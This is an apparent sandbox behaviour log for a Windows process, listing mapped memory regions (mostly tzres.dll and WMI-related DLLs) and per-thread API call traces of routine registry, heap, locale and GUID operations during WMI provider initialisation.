region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5432
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5433
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5434
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5435
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5436
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5437
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5438
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5439
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5440
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5441
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5442
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5443
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5444
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5445
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5446
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5447
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5448
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5449
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5450
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5451
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5452
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5453
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5454
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5455
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5456
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5457
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5458
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5459
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5460
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5461
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5462
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5463
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5464
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5465
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5466
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5467
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5468
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5469
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5470
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5471
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5472
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5473
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 6034
start_va = 0x12d0000
end_va = 0x134ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012d0000"
filename = ""
Region:
id = 6062
start_va = 0x7fef4ff0000
end_va = 0x7fef501bfff
monitored = 0
entry_point = 0x7fef5008194
region_type = mapped_file
name = "wmipcima.dll"
filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll")
Region:
id = 6063
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 6064
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 6065
start_va = 0x75830000
end_va = 0x75832fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmi.dll"
filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll")
Region:
id = 6066
start_va = 0x190000
end_va = 0x192fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cimwin32.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")
Region:
id = 6067
start_va = 0x1010000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 6068
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 6069
start_va = 0x1a0000
end_va = 0x1a1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Thread:
id = 249
os_tid = 0x20c
[0563.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xeec18 | out: lpSystemTimeAsFileTime=0xeec18*(dwLowDateTime=0x6a2a26b0, dwHighDateTime=0x1dab599))
[0563.648] GetCurrentProcessId () returned 0x7e4
[0563.648] GetCurrentThreadId () returned 0x20c
[0563.648] GetTickCount () returned 0x25403
[0563.648] GetTickCount () returned 0x25403
[0563.648] QueryPerformanceCounter (in: lpPerformanceCount=0xeec20 | out: lpPerformanceCount=0xeec20*=2095669396789) returned 1
[0563.648] malloc (_Size=0x100) returned 0x3b56a0
[0563.649] GetProcessHeap () returned 0x1c0000
[0563.649] __dllonexit () returned 0x7fefa2a1e40
[0563.649] GetProcessHeap () returned 0x1c0000
[0563.649] __dllonexit () returned 0x7fefa2a1e50
[0563.650] __dllonexit () returned 0x7fefa2a1e70
[0563.650] GetTickCount () returned 0x25403
[0563.650] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x6c
[0563.651] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x77b10000
[0563.651] GetProcAddress (hModule=0x77b10000, lpProcName="RegCreateKeyExW") returned 0x77b1c830
[0563.651] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0xeea08, lpdwDisposition=0xee9a0 | out: phkResult=0xeea08*=0x0, lpdwDisposition=0xee9a0*=0x2) returned 0x5
[0563.653] GetSystemDirectoryW (in: lpBuffer=0x7fefa2c7afc, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0563.653] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WBEM\\Logs\\" (normalized: "c:\\windows\\system32\\wbem\\logs")) returned 0x10
[0563.653] GetLastError () returned 0x0
[0563.654] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xeea08, lpdwDisposition=0xee9a0 | out: phkResult=0xeea08*=0x0, lpdwDisposition=0xee9a0*=0x2) returned 0x5
[0563.655] _vsnwprintf (in: _Buffer=0xee970, _BufferCount=0x1d, _Format="%d", _ArgList=0xee958 | out: _Buffer="1") returned 1
[0563.655] _vsnwprintf (in: _Buffer=0xee970, _BufferCount=0x1d, _Format="%d", _ArgList=0xee958 | out: _Buffer="65536") returned 5
[0563.655] __dllonexit () returned 0x7fefa2a1ea0
[0563.656] __dllonexit () returned 0x7fefa2a1ed0
[0563.656] __dllonexit () returned 0x7fefa2a1ef0
[0563.656] __dllonexit () returned 0x7fefa2a1f10
[0563.656] __dllonexit () returned 0x7fefa2a1f30
[0563.657] DisableThreadLibraryCalls (hLibModule=0x7fefa260000) returned 1
[0563.657] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x30) returned 0x1de3d0
[0563.657] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x30) returned 0x1de410
[0563.657] GetVersion () returned 0x1db10106
[0563.657] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c30000
[0563.657] GetProcAddress (hModule=0x77c30000, lpProcName="EtwRegisterTraceGuidsW") returned 0x77c70bc0
[0563.657] EtwRegisterTraceGuidsW () returned 0x0
[0563.657] EtwRegisterTraceGuidsW () returned 0x0
[0563.748] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd910
[0563.828] GetModuleHandleW (lpModuleName="Kernel32") returned 0x77b10000
[0563.828] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadPreferredUILanguages") returned 0x77b14fd0
[0563.828] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadPreferredUILanguages") returned 0x77b13d40
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="LocaleNameToLCID") returned 0x77b14fa0
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="GetLocaleInfoEx") returned 0x77b135e0
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="LCIDToLocaleName") returned 0x77b18680
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="GetSystemDefaultLocaleName") returned 0x77b5bbc0
[0563.829] SetLastError (dwErrCode=0x0)
[0563.829] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xef2a0 | out: pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xef2a0) returned 1
[0563.830] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x18) returned 0x1fd490
[0563.830] SetLastError (dwErrCode=0x0)
[0563.830] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x1fd490, pcchLanguagesBuffer=0xef2a0 | out: pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x1fd490, pcchLanguagesBuffer=0xef2a0) returned 1
[0563.830] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x18) returned 0x1fd4b0
[0563.830] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409
[0563.830] LocaleNameToLCID (lpName="en", dwFlags=0x0) returned 0x409
[0563.831] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd490 | out: hHeap=0x1c0000) returned 1
[0563.846] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0563.858] GetProcAddress (hModule=0x77b10000, lpProcName="RegOpenKeyExW") returned 0x77b23a00
[0563.858] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", ulOptions=0x0, samDesired=0x20019, phkResult=0xee4c8 | out: phkResult=0xee4c8*=0x184) returned 0x0
[0563.858] GetProcAddress (hModule=0x77b10000, lpProcName="RegQueryValueExW") returned 0x77b23f00
[0563.858] RegQueryValueExW (in: hKey=0x184, lpValueName="EnableObjectValidation", lpReserved=0x0, lpType=0xee430, lpData=0xee440, lpcbData=0xee434*=0x19 | out: lpType=0xee430*=0x0, lpData=0xee440*=0xc8, lpcbData=0xee434*=0x19) returned 0x2
[0563.858] GetProcAddress (hModule=0x77b10000, lpProcName="RegCloseKey") returned 0x77b240b0
[0563.858] RegCloseKey (hKey=0x184) returned 0x0
Thread:
id = 250
os_tid = 0x248
Thread:
id = 251
os_tid = 0x24c
Thread:
id = 252
os_tid = 0x250
Thread:
id = 253
os_tid = 0x2b4
[0563.906] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0563.907] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0563.926] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9d0
[0563.926] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd630
[0563.926] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9d0 | out: hHeap=0x1c0000) returned 1
[0563.926] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x2c) returned 0x21e640
[0563.927] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd630 | out: hHeap=0x1c0000) returned 1
[0563.927] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0xc8) returned 0x1f6760
[0563.928] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1f6760 | out: hHeap=0x1c0000) returned 1
[0563.928] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x34) returned 0x21e680
[0563.928] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x21e680 | out: hHeap=0x1c0000) returned 1
[0563.928] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x80) returned 0x2137c0
[0563.929] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x21e640 | out: hHeap=0x1c0000) returned 1
[0563.933] memcpy (in: _Dst=0xcee418, _Src=0x22361c, _Size=0x4 | out: _Dst=0xcee418) returned 0xcee418
[0563.934] memcpy (in: _Dst=0xcee418, _Src=0x222f29, _Size=0x4 | out: _Dst=0xcee418) returned 0xcee418
[0563.934] memcpy (in: _Dst=0xcee418, _Src=0x223624, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.935] memcpy (in: _Dst=0xcee418, _Src=0x222f2f, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.935] memcpy (in: _Dst=0xcee418, _Src=0x222f31, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260a9, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260ab, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260ad, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260af, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.958] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x219a90
[0563.958] SafeArrayGetElemsize (psa=0x21e990) returned 0x8
[0563.958] memcpy (in: _Dst=0xcee200, _Src=0xcee128, _Size=0x8 | out: _Dst=0xcee200) returned 0xcee200
[0563.959] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x219a90 | out: hHeap=0x1c0000) returned 1
[0563.959] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0563.960] memcpy (in: _Dst=0xcee418, _Src=0x225a6e, _Size=0x4 | out: _Dst=0xcee418) returned 0xcee418
[0563.982] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcec4d0 | out: lpSystemTimeAsFileTime=0xcec4d0*(dwLowDateTime=0x6a5e84f0, dwHighDateTime=0x1dab599))
[0563.982] GetCurrentProcessId () returned 0x7e4
[0563.982] GetCurrentThreadId () returned 0x2b4
[0563.982] GetTickCount () returned 0x2555a
[0563.982] RtlQueryPerformanceCounter (in: lpPerformanceCount=0xcec4d8 | out: lpPerformanceCount=0xcec4d8*=2095702797152) returned 1
[0563.982] malloc (_Size=0x100) returned 0x3d17d0
[0563.982] malloc (_Size=0x30) returned 0x3cfea0
[0563.983] __dllonexit () returned 0x7fef4b89f70
[0563.983] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
[0563.983] __dllonexit () returned 0x7fef4b89f84
[0563.983] malloc (_Size=0x18) returned 0x3be750
[0563.983] __dllonexit () returned 0x7fef4b8a0a4
[0563.984] __dllonexit () returned 0x7fef4b8a0b8
[0563.984] __dllonexit () returned 0x7fef4b8a0ec
[0563.984] __dllonexit () returned 0x7fef4b8a120
[0563.985] __dllonexit () returned 0x7fef4b8a154
[0563.985] malloc (_Size=0x60) returned 0x3bf2d0
[0563.985] malloc (_Size=0x18) returned 0x3bed10
[0563.985] malloc (_Size=0x18) returned 0x3be1c0
[0563.985] __dllonexit () returned 0x7fef4b8a188
[0563.985] __dllonexit () returned 0x7fef4b8a194
[0563.986] __dllonexit () returned 0x7fef4b8a1c8
[0563.986] __dllonexit () returned 0x7fef4b8a1fc
[0563.986] __dllonexit () returned 0x7fef4b8a240
[0563.986] __dllonexit () returned 0x7fef4b8a254
[0563.988] __dllonexit () returned 0x7fef4b8a268
[0563.988] __dllonexit () returned 0x7fef4b8a2ac
[0563.988] __dllonexit () returned 0x7fef4b8a2e0
[0563.988] __dllonexit () returned 0x7fef4b8a2f4
[0563.989] __dllonexit () returned 0x7fef4b8a328
[0563.989] __dllonexit () returned 0x7fef4b8a35c
[0563.989] __dllonexit () returned 0x7fef4b8a390
[0563.990] __dllonexit () returned 0x7fef4b8a3c4
[0563.990] __dllonexit () returned 0x7fef4b8a3f8
[0563.992] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7feff780000
[0563.992] GetProcAddress (hModule=0x7feff780000, lpProcName="StringFromGUID2") returned 0x7feff7a3560
[0563.992] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3de1ec, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0563.992] __dllonexit () returned 0x7fef4b8a42c
[0563.992] __dllonexit () returned 0x7fef4b8a4b0
[0563.993] __dllonexit () returned 0x7fef4b8a4f0
[0563.993] __dllonexit () returned 0x7fef4b8a524
[0563.993] __dllonexit () returned 0x7fef4b8a558
[0563.994] __dllonexit () returned 0x7fef4b8a58c
[0563.995] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3de42c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0563.995] __dllonexit () returned 0x7fef4b8a5c0
[0563.996] __dllonexit () returned 0x7fef4b8a644
[0563.996] __dllonexit () returned 0x7fef4b8a678
[0563.996] malloc (_Size=0x60) returned 0x3de590
[0563.996] malloc (_Size=0x18) returned 0x3cff90
[0563.996] malloc (_Size=0x18) returned 0x3dd750
[0563.996] __dllonexit () returned 0x7fef4b8a6ac
[0563.996] __dllonexit () returned 0x7fef4b8a6b8
[0563.996] __dllonexit () returned 0x7fef4b8a6ec
[0563.998] __dllonexit () returned 0x7fef4b8a720
[0563.998] __dllonexit () returned 0x7fef4b8a764
[0563.998] __dllonexit () returned 0x7fef4b8a798
[0563.998] __dllonexit () returned 0x7fef4b8a7cc
[0563.999] __dllonexit () returned 0x7fef4b8a7e0
[0563.999] __dllonexit () returned 0x7fef4b8a804
[0564.000] __dllonexit () returned 0x7fef4b8a838
[0564.000] __dllonexit () returned 0x7fef4b8a86c
[0564.000] __dllonexit () returned 0x7fef4b8a8a0
[0564.001] __dllonexit () returned 0x7fef4b8a8d4
[0564.002] __dllonexit () returned 0x7fef4b8a8e8
[0564.002] __dllonexit () returned 0x7fef4b8a910
[0564.003] __dllonexit () returned 0x7fef4b8a944
[0564.003] __dllonexit () returned 0x7fef4b8a978
[0564.004] __dllonexit () returned 0x7fef4b8a9ac
[0564.004] __dllonexit () returned 0x7fef4b8a9f0
[0564.004] __dllonexit () returned 0x7fef4b8aa34
[0564.005] __dllonexit () returned 0x7fef4b8aa68
[0564.005] malloc (_Size=0x28) returned 0x3dfe50
[0564.005] __dllonexit () returned 0x7fef4b8aa9c
[0564.006] __dllonexit () returned 0x7fef4b8aac0
[0564.006] __dllonexit () returned 0x7fef4b8ab04
[0564.007] __dllonexit () returned 0x7fef4b8ab38
[0564.007] __dllonexit () returned 0x7fef4b8ab6c
[0564.007] __dllonexit () returned 0x7fef4b8aba0
[0564.007] __dllonexit () returned 0x7fef4b8abd4
[0564.008] __dllonexit () returned 0x7fef4b8ac08
[0564.008] __dllonexit () returned 0x7fef4b8ac3c
[0564.008] __dllonexit () returned 0x7fef4b8ac70
[0564.008] __dllonexit () returned 0x7fef4b8aca4
[0564.009] __dllonexit () returned 0x7fef4b8acd8
[0564.009] __dllonexit () returned 0x7fef4b8ad0c
[0564.009] __dllonexit () returned 0x7fef4b8ad34
[0564.010] __dllonexit () returned 0x7fef4b8ad68
[0564.010] __dllonexit () returned 0x7fef4b8ad9c
[0564.010] __dllonexit () returned 0x7fef4b8adc4
[0564.010] __dllonexit () returned 0x7fef4b8ae04
[0564.011] __dllonexit () returned 0x7fef4b8ae38
[0564.011] __dllonexit () returned 0x7fef4b8ae6c
[0564.011] __dllonexit () returned 0x7fef4b8aea0
[0564.012] __dllonexit () returned 0x7fef4b8aed4
[0564.012] __dllonexit () returned 0x7fef4b8af08
[0564.012] __dllonexit () returned 0x7fef4b8af3c
